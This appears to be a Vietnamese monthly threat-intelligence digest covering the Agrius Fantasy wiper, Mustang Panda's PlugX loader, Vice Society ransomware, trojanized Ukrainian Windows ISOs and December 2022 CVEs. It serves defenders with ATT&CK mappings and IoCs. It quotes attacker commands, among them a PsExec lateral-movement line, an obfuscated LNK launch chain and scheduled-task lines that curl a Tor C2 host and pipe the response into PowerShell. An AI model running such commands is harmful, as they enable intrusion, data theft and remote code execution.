Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết.

1 Các mối đe dọa nâng cao – Advanced Threats
1.1 Fantasy – công cụ mới của Agrius được triển khai thông qua một cuộc tấn công chuỗi cung ứng
Ngày 07/12, các nhà nghiên cứu của ESET đã phát hiện ra một trình xóa mới và công cụ thực thi của nó, cả hai đều được cho là của nhóm APT Agrius, trong khi phân tích một cuộc tấn công chuỗi cung ứng đối với một nhà phát triển phần mềm của Israel.
Agrius là một nhóm mới có liên kết với Iran nhắm vào các nạn nhân ở Israel và Các Tiểu vương quốc Ả Rập Thống nhất kể từ năm 2020 . Ban đầu, nhóm đã triển khai một trính xóa, Apostle, được ngụy trang dưới dạng ransomware, nhưng sau đó đã sửa đổi Apostle thành ransomware chính thức. Agrius khai thác các lỗ hổng đã biết trong các ứng dụng kết nối Internet để cài đặt webshell, sau đó tiến hành do thám nội bộ trước khi di chuyển sang máy chủ khác và sau đó triển khai các tải trọng độc hại của chúng.
Các công cụ đầu tiên được Agrius triển khai trên các hệ thống nạn nhân là:
· MiniDump, “chức nhận thông tin xác thực từ các kết xuất LSASS ”
· SecretsDump, một tập lệnh Python “thực hiện các kỹ thuật khác nhau để kết xuất hàm băm từ máy tính từ xa”
· Host2IP, một công cụ C#/.NET tùy chỉnh phân giải tên máy chủ thành địa chỉ IP.
Tên người dùng, mật khẩu và tên máy chủ được các công cụ này thu thập để Sandals phát tán và thực thi thành công trình xóa Fantasy.
Sandals là một tệp thực thi Windows 32 bit được viết bằng C#/.NET. Nó được sử dụng để kết nối với các hệ thống trong cùng một mạng thông qua SMB, để ghi một tệp batch nhằm thực thi trình xóa Fantasy, sau đó chạy tệp batch đó qua PsExec bằng chuỗi dòng lệnh sau:
- PsExec.exe /accepteula -d -u “<username>” -p “<password>” -s “C:\<path>\<GUID>.bat”
- Tệp batch được ghi bởi Sandals
- Trình xóa Fantasy cũng là một tệp thực thi Windows 32 bit được viết bằng C#/.NET. Ban đầu, Fantasy tạo một mutex để đảm bảo rằng chỉ có một phiên bản đang chạy. Nó thu thập danh sách các ổ đĩa cố định nhưng loại trừ ổ đĩa có thư mục %WINDOWS% . Sau đó, nó đi vào một vòng lặp for lặp qua danh sách ổ đĩa để tạo danh sách thư mục đệ quy và sử dụng phương thức RNGCryptoServiceProvider. Phương thức GetBytes tạo một chuỗi mật mã giá trị ngẫu nhiên mạnh trong một mảng 4096 byte. Nếu đối số là 411 được cung cấp cho trình xóa, thì vòng lặp for sẽ ghi đè nội dung của mọi tệp bằng mảng byte đã nói ở trên bằng cách sử dụng vòng lặp while lồng nhau. Mặt khác, vòng lặp for chỉ ghi đè lên các tệp có phần mở rộng tệp được liệt kê trong Phụ lục.
Sau đó Fantasy gán một dấu thời gian cụ thể (2037-01-01 00:00:00) cho các tệp này và sau đó xóa tập tin.
Trong vòng lặp for, trình xóa Fantasy đếm lỗi trong thư mục hiện tại khi cố gắng ghi đè lên tệp. Nếu số lượng lỗi vượt quá 50, nó sẽ ghi một tệp batch, %WINDOWS%\Temp\<GUID>.bat, tệp này sẽ xóa thư mục chứa các tệp gây ra lỗi, sau đó tự xóa. Việc xóa tệp sau đó sẽ tiếp tục trong thư mục tiếp theo trong danh sách.
Sau khi vòng lặp for hoàn tất, trình xóa Fantasy sẽ tạo một tệp batch trong %WINDOWS%\Temp được gọi là registry.bat. Tệp batch xóa các khoá đăng ký sau:
· HKCR\.EXE
· HKCR\.dll
· HKCR\*
Sau đó, nó chạy lệnh sau để cố xóa bộ nhớ cache của hệ thống tệp:
· %windir%\system32\rundll32.exe advapi32.dll,ProcessIdleT task
Cuối cùng, registry.bat tự xóa chính nó (del %0).
Tiếp theo, trình xóa Fantasy xóa tất cả nhật ký sự kiện Windows và tạo một tệp batch khác, system.bat, trong %WINDOWS%\Temp, tệp này sẽ xóa đệ quy tất cả các tệp trên %SYSTEMDRIVE% , cố gắng xóa bộ nhớ cache của hệ thống tệp và tự xóa. Sau đó, Fantasy ngủ trong hai phút trước khi ghi đè lên Bản ghi khởi động chính của hệ thống .
Tiếp, trình xóa Fantasy ghi một tệp batch khác, %WINDOWS%\Temp\remover.bat, xóa trình xóa Fantasy khỏi đĩa rồi tự xóa. Sau đó, trình xóa Fantasy ngủ trong 30 giây trước khi khởi động lại hệ thống với mã lý do SHTDN_REASON_MAJOR_OTHER (0x00000000) — Other issue.
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Resource Development | T1587 | Develop Capabilities |
Resource Development | T1587.001 | Develop Capabilities: Malware |
Initial Access | T1078.002 | Valid Accounts: Domain Accounts |
Initial Access | T1078.003 | Valid Accounts: Local Accounts |
Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell |
Privilege Escalation | T1134 | Access Token Manipulation |
Defense Evasion | T1070.006 | Indicator Removal on Host: Timestomp |
Credential Access | T1003 | OS Credential Dumping |
Discovery | T1135 | Network Share Discovery |
Lateral Movement | T1021.002 | Remote Services: SMB/Windows Admin Shares |
Lateral Movement | T1570 | Lateral Tool Transfer |
Impact | T1485 | Data Destruction |
Impact | T1561.002 | Disk Wipe |
Impact | T1561.001 | Disk Wipe: Disk Content Wipe |
Impact | T1529 | System Shutdown/Reboot |
Indicators of Compromise (IoCs)
Files / hash SHA 1
1A62031BBB2C3F55D44F59917FD32E4ED2041224
820AD7E30B4C54692D07B29361AECD0BB14DF3BE
1AAE62ACEE3C04A6728F9EDC3756FABD6E342252
5485C627922A71B04D4C78FBC25985CDB163313B
DB11CBFFE30E0094D6DE48259C5A919C1EB57108
3228E6BC8C738781176E65EBBC0EB52020A44866
B3B1EDD6B80AF0CDADADD1EE1448056E6E1B3274
Nguồn: https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/
1.2 Mustang Panda tấn công các mục tiêu Châu Âu và Châu Á Thái Bình Dương
Ngày 06/12, nhóm Tình báo và Nghiên cứu Mối đe dọa của BlackBerry gần đây đã tìm thấy một tệp RAR thú vị có tiêu đề “Political Guidance for the new EU approach towards Russia.rar”.
Mustang Panda, còn được gọi là HoneyMyte, Bronze President hoặc Red Delta, là một trong những nhóm APT tích cực hoạt động hiện nay, với nhiều chiến dịch được ghi lại từ năm 2012. Nó được quy kết công khai cho các hoạt động gián điệp mạng phục vụ lợi ích của Trung Quốc.
Tệp lưu trữ RAR – “Political Guidance for the new EU approach towards Russia.rar” – phù hợp với nhiều TTP liên quan đến Mustang Panda mà trước đây đã được cả BlackBerry và các nhà cung cấp khác ghi lại.
Chủ đề chính trị của tệp RAR là một chiến thuật được kẻ đe dọa sử dụng để thu hút các mục tiêu mở tệp. Sau khi tệp lưu trữ được mở, nạn nhân sẽ thấy một thư mục có tên “_” và một tệp lối tắt có cùng tên chủ đề chính trị.
Tệp .LNK sử dụng phần mở rộng tệp kép nhằm cố gắng ngụy trang tệp lối tắt dưới dạng tài liệu với hy vọng mục tiêu sẽ mở nó trong quá trình thực thi tệp lối tắt.
Tệp lối tắt chứa một lệnh khởi động quá trình thực thi ban đầu của chuỗi tấn công:
“C:\Windows\System32\cmd.exe /c “_\___\_\___\______\_____\__\test11.bpu||(forfiles /^P %USERPROFILE%\ /S /^M “Hướng dẫn chính trị cho cách tiếp cận mới của EU đối với Nga.rar” /C “cmd /c (c:\progra~1\7-Zip\7z x -y -aoa @path||c:\progra~2\7-Zip\7z x -y -aoa @path”
Tệp LNK sẽ thực thi “test11.bpu”, đây là tệp thực thi (PE) hợp pháp có tên là “ClassicExplorerSettings.exe” thuộc Classic Shell, một tiện ích phần mềm miễn phí được sử dụng để tùy chỉnh giao diện của hệ thống Windows.
“ClassicExplorer32.dll” được đặt trong cùng thư mục với “test11.bpu” để lạm dụng thứ tự tìm kiếm sau khi tệp thực thi được gọi. Mục đích của DLL là tải tệp “ClassicExplorerLog.dat” và thực thi mã shell bên trong tệp đó. Thật thú vị, trình tải được sử dụng dường như có một sự thay đổi nhỏ trong cách mã shellcode được giải mã và thực thi.
Trình tải Mustang Panda DLL được Secureworks báo cáo hồi tháng 9 đã sử dụng API EnumThreadWindows để chuyển thực thi đến phần đầu của tệp tải trọng độc hại. Trong các mẫu gần đây hơn này, trình tải DLL sử dụng API EnumSystemCodePagesW để thực thi mã shell tương tự. Một con trỏ tới shellcode đã được giải mã sẽ được chuyển tới API EnumSystemCodePagesW dưới dạng hàm gọi lại do ứng dụng xác định, như thể hiện trong Hình 3 bên dưới. Việc sử dụng API EnumSystemCodePagesW đã được kienbigmummy đề cập trong một chủ đề Twitter và cũng được thấy trong một bài thuyết trình của Black Hat Asia. Mục đích của shellcode là giải mã và thực thi tải trọng độc hại cuối cùng – PlugX – trong bộ nhớ.
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Execution | T1203 | Exploitation for Client Execution |
Execution | T1106 | Native API |
Execution | T1129 | Shared Module |
Execution | T1559.001 | Component Object Model |
Execution | T1204.002 | Malicious File |
Execution | T1059.003 | Windows Command Shell |
Persistence/Privilege Escalation | T1547.001 | Registry Run Keys / Startup Folder |
Defense Evasion | T1574.002 | DLL Side-Loading |
Defense Evasion | T1027 | Obfuscated Files or Information |
Defense Evasion | T1036 | Masquerading |
Defense Evasion | T1036.007 | Double File Extension |
Defense Evasion | T1218 | System Binary Proxy Execution |
Defense Evasion | T1564.001 | Hidden Files and Directories |
Defense Evasion | T1140 | Deobfuscate Decode Files or Information |
Discovery | T1057 | Process Discovery |
Discovery | T1082 | System Information Discovery |
Discovery | T1518 | Software Discovery |
Discovery | T1033 | System Owner/User Discovery |
Collection | T1560.001 | Archive via Utility |
Persistence | T1547.009 | Shortcut |
Command and Control | T1071.001 | Web Protocols |
Indicators of Compromise (IoCs)
Files / hash SHA 256
F70d3601fb456a18ed7e7ed599d10783447016da78234f5dca61b8bd3a084a15
C&C – IP
104.42.43.178
64.34.216.50
45.147.26.45
45.32.101.7
64.34.216.44
185.80.201.4
103.192.226.87
194.124.227.90
43.254.218.128
62.233.57.49
1.3 Vice Society: Lập hồ sơ về mối đe dọa dai dẳng đối với ngành giáo dục
Ngày 06/12, nhóm nghiên cứ Unit42 của Paloalto đã lập hồ sơ về Vice Society, là một băng đảng tống tiền đã tham gia vào hoạt động nổi tiếng chống lại các trường học trong năm nay. Không giống như nhiều nhóm ransomware khác như LockBit theo mô hình ransomware-as-a-service (RaaS) điển hình, hoạt động của Vice Society khác ở chỗ chúng được biết đến với việc sử dụng các nhánh của các họ ransomware có sẵn trong chuỗi tấn công của chúng, được bán trên thị trường DarkWeb. Chúng bao gồm các chủng ransomware HelloKitty (còn gọi là FiveHands) và Zeppelin. Ngoài ra Vice Society đang phát triển tải trọng tùy chỉnh của riêng chúng.
Trong năm qua, Vice Society đã vận hành các trang web trên mạng Tor bằng địa chỉ .onion sau :
vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad[.]onion
Vào ngày 20 tháng 10, địa chỉ .onion chính không hoạt động, trong khi trang web nhân bản sau vẫn hoạt động:
ssq4zimieeanazkzc5ld4v5hdibi2nzwzdibfh5n5w4pw5mcik76lzyd[.]onion
Gần đây, tiêu đề cho trang blog của nhóm có sự tương đồng với logo của một trò chơi điện tử nổi tiếng có tựa đề “Grand Theft Auto: Vice City”
Vào ngày 25 tháng 10 , địa chỉ .onion ban đầu đã hoạt động trở lại. Nó đã được cập nhật để bao gồm các phần blog bổ sung.
Khi nhóm bắt đầu hoạt động vào năm 2021, Vice Society đã sử dụng biến thể HelloKitty Ransomware làm trọng tải chính trong chuỗi lây nhiễm của họ. Họ ransomware này được phát hiện lần đầu tiên vào tháng 12 năm 2020, chủ yếu nhắm mục tiêu vào các hệ thống Windows. Biến thể này lấy tên từ mutex của nó: HELLOKITTYMutex .
Nhóm Vice Society cũng sử dụng Zeppelin ransomware trong chuỗi lây nhiễm của chúng. Sau khi thực thi, mã nhị phân ransomware tự xóa và để lại một ghi chú đòi tiền chuộc trên màn hình của máy nạn nhân có tiêu đề “!!! TẤT CẢ CÁC TẬP TIN CỦA BẠN ĐỀU ĐƯỢC MÃ HÓA!!!.TXT”. Địa chỉ email liên hệ do kẻ tấn công cung cấp khác nhau giữa các mẫu nhưng địa chỉ v-society.official@onionmail[.]org công khai và liên kết Tor .onion vẫn nhất quán.
Zeppelin cũng thực hiện các hành vi:
· Tạo khoá đăng ký HKCU\Software\Zeppelin
· Nối phần mở rộng có định dạng A1A-A80-4CD vào các tệp được mã hóa
· Tạo một tệp có tên README.txt.v-society
· Imphash: 8acb34bed3caa60cae3f08f75d53f727
· Tạo tệp tạm thời có phần mở rộng .Zeppelin có định dạng sau – C:\Users\<User>\AppData\Local\Temp\7D3ED7F1.Zeppelin
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Initial Access | T1566 | Phishing |
Initial Access | T1078 | Valid Accounts |
Initial Access | T1190 | Exploit Public-Facing Applications |
Execution | T1047 | Windows Management Instrumentation (WMI) |
Execution | T1053.005 | Scheduled Task/Job |
Execution | T1059.001 | Command and Scripting Interpreter: Powershell |
Execution | T1059.003 | Command and Scripting Interpreter: Command Shell |
Persistence | T1543.003 | Modify System Process |
Persistence | T1547.001 | Registry Run Keys/Startup Folder |
Persistence | T1574.002 | DLL Side-Loading |
Privilege Escalation | T1068 | Exploitation for Privilege Escalation |
Defense Evasion | T1036 | Masquerading |
Defense Evasion | T1055 | Process Injection |
Defense Evasion | T1070 | Indicator Removal on Host |
Defense Evasion | T1112 | Modify Registry |
Defense Evasion | T1497 | Sandbox Evasion |
Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools |
Credential Access | T1003 | OS Credential Dumping |
Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory |
Credential Access | T1003.003 | OS Credential Dumping: NTDS |
Discovery | T1046 | Network Service Discovery |
Discovery | T1482 | Domain Trust Discovery |
Lateral Movement | T1021 | Remote Services |
Lateral Movement | T1021.002 | Remote Services: SMB/Windows Admin Shares |
Lateral Movement | T1080 | Taint Shared Content |
Lateral Movement | T1570 | Lateral Tool Transfer |
Exfiltration | T1020 | Automated Exfiltration |
Exfiltration | T1041 | Exfiltration over C2 Channel |
Exfiltration | T1048 | Exfiltration Over Alternative Protocol |
Exfiltration | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage |
Command and Control | T1219 | Remote Access Software |
Impact | T1486 | Data Encrypted for Impact |
Impact | T1531 | Account Access Removal |
Indicators of Compromise (IoCs)
Files / hash SHA 256
643a3121166cd1ee5fc6848f099be7c7c24d36f5922f58052802b91f032a5f0f
754f2022b72da704eb8636610c6d2ffcbdae9e8740555030a07c8c147387a537
78efe6f5a34ba7579cfd8fc551274029920a9086cb713e859f60f97f591a7b04
16a0054a277d8c26beb97850ac3e86dd0736ae6661db912b8782b4eb08cfd36e
4a4be110d587421ad50d2b1a38b108fa05f314631066a2e96a1c85cc05814080
307877881957a297e41d75c84e9a965f1cd07ac9d026314dcaff55c4da23d03e
faa79c796c27b11c4f007023e50509662eac4bca99a71b26a9122c260abfb3c6
dd89d939c941a53d6188232288a3bd73ba9baf0b4ca6bf6ccca697d9ee42533f
4440763b18d75a0f9de30b1c4c2aeb3f827bc4f5ea9dd1a2aebe7e5b23cfdf94
24efa10a2b51c5fd6e45da6babd4e797d9cae399be98941f950abf7b5e9a4cd7
bafd3434f3ba5bb9685e239762281d4c7504de7e0cfd9d6394e4a85b4882ff5d
aa7e2d63fc991990958dfb795a0aed254149f185f403231eaebe35147f4b5ebe
001938ed01bfde6b100927ff8199c65d1bff30381b80b846f2e3fe5a0d2df21d
Ab440c4391ea3a01bebbb651c80c27847b58ac928b32d73ed3b19a0b17dd7e75
vicesociety@onionmail[.]org
v-society.official@onionmail[.]org
LarryGold@onionmail[.]org
MollyThomson@onionmail[.]org
BruceBoyle@onionmail[.]org
SylvesterJones@onionmail[.]org
brendaevans4454@onionmail[.]org
warreinolds77@onionmail[.]org
DaltonReed@onionmail[.]org
FreddieFerrell@onionmail[.]org
lewiselsberry@onionmail[.]org
inezeng@onionmail[.]org
lonnieguzman@onionmail[.]org
thomasmoore@onionmail[.]org
C&C
vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad[.]onion
Qu5dci2k25x2imgki2dbhcwegqqsqsrjj5d3ugcc5kpsgbtj2psaedqd[.]onion
Wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd[.]onion
gunyhng6pabzcurl7ipx2pbmjxpvqnu6mxf2h3vdeenam34inj4ndryd[.]onion
Nguồn: https://unit42.paloaltonetworks.com/vice-society-targets-education-sector/
2 Malware
2.1 Phân tích trojan giả mạo file cài đặt hệ điều hành windows 10 nhắm tới chính phủ Ukraine
Gần đây, Mandiant phát hiện một số mẫu mã độc giả mạo các file ISO lưu trữ trên các trang web tiếng Ukraina và tiếng Nga. Sau khi file ISO được cài đăt, nó sẽ thu thập thông tin hệ thống và triển khai thêm các payload mới là các backdoor bao gồm STOWAWAY, BEACON và SPAREPART
Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4)
Được tải xuống từ địa chỉ: https://toloka.to/t657016#1873175
File ISO sau khi cài đặt sẽ thực hiện thay đổi 2 schedule tasks hợp pháp trong windows là GatherNetworkInfo và Consolidator. Với mục đích tải xuống payload mới từ địa chỉ TOR C2 và thực thi bằng powershell cụ thể như sau:
· C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d)
§ Last edit date: 2022-05-11 12:58:55
§ Executes: powershell.exe (curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H (‘h:’+(wmic csproduct get UUID)))
· C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf)
§ Last edit date: 2022-05-11 12:58:12
§ Executes: powershell.exe curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H (‘h:’+(wmic csproduct get UUID)) | powershell.exe
Bên trong file ISO có thêm một file bashscript có tên SetupComplete.cmd, có nhiệm vụ vô hiệu hóa một số dịch vụ (services) và tác vụ (task), vô hiệu hóa các cập nhật Windows, chặn địa chỉ IP và các tên miền liên quan đến các dịch vụ hợp phát của Microsoft, vô hiệu hóa OneDrive và active license Windows
· SetupComplete.cmd (MD5: 84B54D2D022D3DF9340708B992BF6669)
§ Batch script có nhiệm vụ vô hiệu hóa một số dịch vụ (services) và tác vụ (task) trên Windows
· SetupComplete.cmd (MD5: 67C4B2C45D4C5FD71F6B86FA0C71BDD3)
§ Batch script có nhiệm vụ vô hiệu hóa một số dịch vụ (services) và tác vụ (task) trên Windows
· SetupComplete.cmd (MD5: 5AF96E2E31A021C3311DFDA200184A3B)
§ Batch script có nhiệm vụ vô hiệu hóa một số dịch vụ (services) và tác vụ (task) trên Windows
Để theo dõi, kẻ tấn công sử dụng UUID của thiết bị làm mã định danh để theo dõi nạn nhân. Các thông tin thu thập thông bao gồm thông tin hệ thống, danh sách thư mục và vị trí địa lý. Sau khi xác định thiết bị có khả năng chứa các thông tin có giá trị, kẻ tấn công có thể thực hiện triển khi thêm các payload mới:
· Triển khai các công cụ để cho phép đánh cắp dữ liệu (như TOR và Sheret)
· Triển khai các backdoor có khả năng cung cấp quyền truy ở máy nạn nhân (như SPAREPART)
· Triển khai các backdoor để có thể sử dụng các chức năng bổ sung (như BEACON và STOWAWAY
Sparepart backdoor được triển khai thông qua các schedule tasks đã đề cập trước đó. Được thực thi dưới dạng Windows Service DLL, sau khi thực thi mã độc sẽ lấy UUID của thiết bị sử dụng trong giao tiếp với máy chủ C2
Bằng cách sử dụng các hàm API WinHttp với user agent được fix cứng “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0”, mã độc sẽ tải xuống payload mới với URL được cung cấp
Bên cạnh SPAREPART, kẻ tấn công còn triển khai thêm mã độc khác thông qua lập lịch có tên AzureSync. Sử dụng rundll32 để load DLL độc hại AzureSettingSync.dll. DLl này được cấu hình để giao tiếp với địa chỉ cdnworld[.]org
· C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c)
§ BEACON backdoor
§ Original name: tr2fe.dll
§ Compiled on: 1970/01/01 00:00:00
§ Dropped by 529388109f4d69ce5314423242947c31 (BEACON)
§ Connects to https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–
§ Connects to https://cdnworld[.]org/34702–general/sync/42823419-cdn
Indicators of Compromise (IoCs)
File
AzureSettingSync.dll MD5: 59a3129b73ba4756582ab67939a2fe3c
splwow86.exe MD5: 0f06afbb4a2a389e82de6214590b312b
%LOCALAPPDATA%\SODUsvc.exe MD5: a8e7d8ec0f450037441ee43f593ffc7c
Malicious Windows Image Tor C2:
56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe
ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe
ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]ws
C2:
https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–
https://cdnworld[.]org/34702–general/sync/42823419-cdn
193.142.30[.]166:443
91.205.230[.]66:8443
Nguồn tham khảo: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
3 CVE và các khuyến nghị bảo mật
3.1 Microsoft Patch Tuesday – December 2022
Trong tháng 12, Microsoft đã phát hành các bản vá cho 52 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Azure; Office và Office Components; SysInternals; Microsoft Edge (Chromium-based); SharePoint Server; và.NET framework. Trong đó có 6 lỗ hổng được đánh giá mức độ Nghiêm trọng, 43 lỗ hổng được đánh giá là Improtant và 3 lỗ hổng được đánh giá là Moderate.
Dưới đây là một số CVE nổi bật được đánh giá ở mức độ Critical và Improtant:
3.1.1 CVE-2022-44690/ CVE-2022-44693 – Microsoft SharePoint Server Remote Code Execution Vulnerability
CVSS v3: 8.8/10
Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng yêu cầu xác thực cùng quyền Manage Lists trong SharePoint
Phiên bản ảnh hưởng:
Microsoft SharePoint Foundation 2013 Service Pack 1
Microsoft SharePoint Server Subscription Edition
Microsoft SharePoint Server 2019
Microsoft SharePoint Enterprise Server 2013 Service Pack 1
Microsoft SharePoint Enterprise Server 2013 Service Pack 1
Microsoft SharePoint Enterprise Server 2016
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-44690
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-44693
3.1.2 CVE-2022-41076 – PowerShell Remote Code Execution Vulnerability.
CVSS v3: 8.5/10
Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi các câu lệnh trên hệ thống bị ảnh hưởng, được cho là cũng ảnh hưởng đến các sản phẩm sử dụng PowerShell Remoting Session Configuration bao gồm Exchange on-premises cũng như Exchange Online, Skype for Business Server
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 Datacenter: Azure Edition
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
PowerShell 7.3
PowerShell 7.2
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41076
3.1.3 CVE-2022-44704 – Microsoft Windows Sysmon Elevation of Privilege Vulnerability
CVSS v3: 7.8/10
Mô tả: Lỗ hổng cho phép kẻ tấn công leo thang đặc quyền lên quyền SYSTEM
Phiên bản ảnh hưởng:
Windows Sysmon
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-44704
3.2 Ứng Dụng Web Và Các Sản Phẩm Khác
3.2.1 CVE-2022-27518 – Citrix Application Delivery Controller (ADC) and Gateway Authentication Bypass Vulnerability
CVSS v3: 9.8/10
Mô tả: Lỗ hổng cho phép kẻ tấn công không cần xác thực thực thi mã từ xa trên thiết bị bị ảnh hưởng. Lỗ hổng đang được sử dụng bởi các nhóm tấn công
Phiên bản ảnh hưởng:
Citrix ADC and Citrix Gateway 13.0 before 13.0-58.32
Citrix ADC and Citrix Gateway 12.1 before 12.1-65.25
Citrix ADC 12.1-FIPS before 12.1-55.291
Citrix ADC 12.1-NDcPP before 12.1-55.291
Ghi chú: Citrix ADC and Citrix Gateway versions 13.1 không bị ảnh hưởng
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://www.citrix.com/blogs/2022/12/13/critical-security-update-now-available-for-citrix-adc-citrix-gateway/
3.2.2 CVE-2022-31700 – Remote Code Execution Vulnerability
CVSS v3: 7.2/10
Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên thiết bị bị ảnh hưởng. Khai thác lỗ hổng yêu cầu xác thực
Phiên bản ảnh hưởng:
VMware Workspace ONE Access và Identity Manager
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://www.vmware.com/security/advisories/VMSA-2022-0032.html